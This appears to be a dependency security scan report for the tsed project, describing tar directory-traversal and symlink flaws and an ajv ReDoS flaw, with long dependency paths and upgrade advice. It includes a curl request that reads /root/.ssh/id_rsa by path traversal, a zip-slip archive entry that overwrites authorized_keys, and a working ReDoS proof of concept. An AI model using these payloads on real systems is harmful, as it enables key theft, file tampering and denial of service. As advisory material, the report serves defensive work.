  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via the extract() function. An attacker can read or write files outside the intended extraction directory by causing the application to extract a malicious archive containing a chain of symlinks leading to a hardlink, which bypasses path validation checks.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.8 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: ajv
  • Introduced through: ajv@8.17.1

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed ajv@8.17.1
    Remediation: Upgrade to ajv@8.18.0.

Overview

ajv is an Another JSON Schema Validator

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper validation of the pattern keyword when combined with $data references. An attacker can cause the application to become unresponsive and exhaust CPU resources by submitting a specially crafted regular expression payload.

Note:

This is only exploitable if the $data option is enabled.

PoC

const Ajv = require('ajv');

// Vulnerable configuration — $data enables runtime pattern injection
const ajv = new Ajv({ $data: true });

const schema = {
  type: 'object',
  properties: {
    pattern: { type: 'string' },
    value: {
      type: 'string',
      pattern: { $data: '1/pattern' }  // Pattern comes from the data itself
    }
  }
};

const validate = ajv.compile(schema);

// Malicious payload — both the pattern and the triggering input
const maliciousPayload = {
  pattern: '^(a|a)*$',           // Catastrophic backtracking pattern
  value: 'a'.repeat(30) + 'X'    // 30 'a's followed by 'X' to force full backtracking
};

console.time('attack');
validate(maliciousPayload);       // Blocks the entire Node.js process for ~44 seconds
console.timeEnd('attack');

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ajv to version 6.14.0, 8.18.0 or higher.

References

high severity

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.6.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 tar@6.2.1
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmaccess@8.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack exploitable via stripAbsolutePath(), used by the Unpack class. An attacker can overwrite arbitrary files outside the intended extraction directory by including a hardlink whose linkpath uses a drive-relative path such as C:../target.txt in a malicious tar.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.10 or higher.

References

high severity

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.6.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 tar@6.2.1
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmaccess@8.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
